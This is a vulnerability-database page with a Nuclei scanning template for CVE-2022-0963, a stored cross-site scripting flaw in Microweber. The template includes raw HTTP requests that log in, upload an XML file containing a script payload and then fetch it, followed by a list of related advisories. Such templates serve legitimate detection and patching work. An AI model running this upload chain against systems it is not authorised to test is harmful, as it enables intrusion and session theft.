| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Unrestricted XML Files Leads to Stored XSS | 12 Mar 202205:44 | – | huntr | |
| CVE-2022-0963 | 15 Mar 202216:15 | – | attackerkb | |
| Microweber 跨站脚本漏洞 | 15 Mar 202200:00 | – | cnnvd | |
| Microweber File Upload Vulnerability (CNVD-2022-20514) | 17 Mar 202200:00 | – | cnvd | |
| CVE-2022-0963 | 15 Mar 202215:30 | – | cve | |
| CVE-2022-0963 Unrestricted XML Files Leads to Stored XSS in microweber/microweber | 15 Mar 202215:30 | – | cvelist | |
| EUVD-2022-1508 | 3 Oct 202520:07 | – | euvd | |
| Unrestricted XML files leading to cross-site scripting in Microweber | 16 Mar 202200:00 | – | github | |
| CVE-2022-0963 | 15 Mar 202216:15 | – | nvd | |
| CVE-2022-0963 Unrestricted XML Files Leads to Stored XSS in microweber/microweber | 15 Mar 202215:30 | – | osv |
id: CVE-2022-0963
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.
impact: |
Authenticated attackers can upload malicious XML files containing XSS payloads that execute when users access the uploaded files, potentially stealing session cookies or performing unauthorized actions.
remediation: |
Upgrade Microweber CMS to version 1.2.12 or later to mitigate the vulnerability.
reference:
- https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
- https://github.com/advisories/GHSA-q3x2-jvp3-wj78
- https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
- https://nvd.nist.gov/vuln/detail/CVE-2022-0963
- https://github.com/microweber/microweber/commit/975fc1d6d3fba598ee550849ceb81af23ce72e08
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0963
cwe-id: CWE-79
epss-score: 0.01877
epss-percentile: 0.76862
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: microweber
product: microweber
shodan-query:
- http.favicon.hash:780351152
- http.html:"microweber"
fofa-query:
- body="microweber"
- icon_hash=780351152
tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive,vuln
http:
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /plupload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
Referer: {{BaseURL}}admin/view:modules/load_module:files
-----------------------------59866212126262636974202255034
Content-Disposition: form-data; name="name"
{{randstr}}.xml
-----------------------------59866212126262636974202255034
Content-Disposition: form-data; name="chunk"
0
-----------------------------59866212126262636974202255034
Content-Disposition: form-data; name="chunks"
1
-----------------------------59866212126262636974202255034
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
-----------------------------59866212126262636974202255034--
- |
GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_3,"alert(document.domain)")'
- 'status_code_3==200'
- 'contains(body_2,"bytes_uploaded")'
condition: and
# digest: 490a004630440220657db9e38138093f61a5b14cd4d209a805cba5bddc15b7bf7650330aa1d42ad102203f191b6e9b71fb87a5033662d73c6936c79fa81472b85ee7bd1530352702067e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation